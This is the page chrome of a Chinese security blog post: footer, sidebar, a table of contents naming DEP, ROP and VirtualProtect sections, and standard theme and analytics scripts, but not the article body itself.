    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！</li>
</ul>

      </div>
    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/06/02/i%E6%98%A5%E7%A7%8B-%E5%B0%8F%E5%8F%AF%E7%88%B1/" rel="next" title="i春秋-小可爱">
                <i class="fa fa-chevron-left"></i> i春秋-小可爱
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/06/14/%E5%88%86%E5%8C%BA%E8%A1%A8/" rel="prev" title="分区表">
                分区表 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/author.jpg"
                alt="π1L4r" />
            
              <p class="site-author-name" itemprop="name">π1L4r</p>
              <p class="site-description motion-element" itemprop="description">changed my nickname= =.</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">39</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">20</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  <a href="https://github.com/such-stupid6" target="_blank" title="GitHub"><i class="fa fa-fw fa-github"></i>GitHub</a>
                  
                </span>
              
                <span class="links-of-author-item">
                  <a href="mailto:alexi_bi@qq.com" target="_blank" title="E-Mail"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  
                </span>
              
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://mlogs.top" title="My0sotis" target="_blank">My0sotis</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=320 height=110 src="//music.163.com/outchain/player?type=0&id=5055514487&auto=1&height=90"></iframe>
        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#导语"><span class="nav-number">1.</span> <span class="nav-text">导语</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#DEP"><span class="nav-number">2.</span> <span class="nav-text">DEP</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ROP"><span class="nav-number">3.</span> <span class="nav-text">ROP</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#VirtualProtect"><span class="nav-number">4.</span> <span class="nav-text">VirtualProtect</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#实际操作"><span class="nav-number">5.</span> <span class="nav-text">实际操作</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#后记"><span class="nav-number">6.</span> <span class="nav-text">后记</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright"> &copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">π1L4r</span>

  

  
</div>




  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动 v4.2.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Pisces</a> v6.5.0</div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="总访客量">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="总访问量">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  
    
      
  
  <script type="text/javascript" color='114,114,114' opacity='1' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>









  





  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script id="ribbon" type="text/javascript" size="300" alpha="0.6"  zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.5.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.5.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.5.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.5.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.5.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.5.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.5.0"></script>



  



  










  




  
  
  
  <link rel="stylesheet" href="/lib/algolia-instant-search/instantsearch.min.css">

  
  
  <script src="/lib/algolia-instant-search/instantsearch.min.js"></script>
  

  <script src="/js/src/algolia-search.js?v=6.5.0"></script>



  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  

  
  

  
  

  


  
  

  

  

  

  

  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('复制').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('复制成功')
          else $(this).text('复制失败')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('复制')
        }, 300)
      }).append(e)
    })
  </script>


<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":200,"height":400},"mobile":{"show":true},"log":false});</script></body>
</html>
<script type="text/javascript" src="/js/src/love.js"></script>